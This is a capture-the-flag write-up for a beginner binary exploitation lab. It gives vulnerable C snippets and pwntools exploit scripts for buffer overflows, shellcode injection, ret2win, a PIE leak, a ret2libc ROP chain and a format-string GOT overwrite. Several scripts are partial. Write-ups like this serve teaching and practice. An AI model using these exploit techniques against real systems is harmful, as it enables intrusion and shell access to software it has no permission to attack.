TryPwnMe One

A beginner-friendly series on binary exploitation across buffer overflows, return-to-win, shellcode injection and format string vulnerabilities.

Tools & Resources

TryOverflowMe 1

Target: 10.10.4.76:9003

A classic buffer overflow where overwriting 16-byte buffer spills into the `admin` variable, allowing flag access.

Relevant Code:

int admin = 0;
char buf[0x10];
gets(buf);
if (admin) { read flag.txt }

Exploit Script:

from pwn import *

p = remote('10.10.4.76', 9003)
payload = b'A' * 16 + p32(1) * 32
p.sendline(payload)
p.interactive()

TryOverflowMe 2

Target: 10.10.4.76:9004

Overwriting the `admin` variable to 0x59595959 after filling 64 bytes allows the `read_flag()` call.

Relevant Code:

int admin = 0;
char buf[64];
gets(buf);
if (admin == 0x59595959) { read_flag(); }

Exploit Script:

p = remote('10.10.4.76', 9004)
payload = b'A' * 64 + p32(0x59595959) * 32
p.sendline(payload)
p.interactive()

TryExecMe

Target: 10.10.4.76:9005

The program executes the input directly—so we send shellcode using Pwntools' `shellcraft.sh()`.

Relevant Code:

char *buf[128];
read(0, buf, sizeof(buf));
((void(*)())buf)();

Exploit Script:

context.arch = 'amd64'
p = remote('10.10.4.76', 9005)
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

TryRetMe

Target: 10.10.4.76:9006

Overflow the buffer and overwrite the return address to jump to `win()`.

Relevant Code:

void vuln() {
  read(0, buf, 0x200);
}
int win() {
  system("/bin/sh");
}

Exploit Script:

context.binary = binary = ELF("tryretme")
rop = ROP(binary)
ret = rop.find_gadget(["ret"])[0]
win = binary.symbols["win"]

payload = b"A"*256 + b"B"*8 + p64(ret) + p64(win)
p.sendline(payload)
p.interactive()

Random Memories

Target: 10.10.4.76:9007

Leaking PIE base from printed address of vuln, calculate offset to `win()`.

Relevant Code:

printf("Secret: %llx", &vuln);

Exploit Script:

recv = int(p.recvline().decode().strip(), 16)
base = recv - binary.symbols["vuln"]
binary.address = base
payload = b"A"*256 + b"B"*8 + p64(ret) + p64(binary.symbols["win"])
p.sendline(payload)
p.interactive()

TheLibrarian

Target: 10.10.4.76:9008

ROP chain to leak puts@GOT, calculate libc base, then return to system('/bin/sh')

Relevant Code:

puts(binary.got["puts"]) → leak libc base
system("/bin/sh")

Exploit Script:

payload = b"A"*256 + b"B"*8 + p64(pop_rdi) + p64(binary.got["puts"]) + p64(binary.plt["puts"]) + p64(binary.symbols["vuln"])
p.sendline(payload)
# use leaked puts to calculate libc base

Not Specified

Target: 10.10.4.76:9009

A format string vulnerability where `%n` or `%p` can be used to leak or overwrite memory.

Relevant Code:

printf(username);

Exploit Script:

payload = fmtstr_payload(6, {binary.got["puts"]: binary.symbols["win"]})
p.sendline(payload)
p.interactive()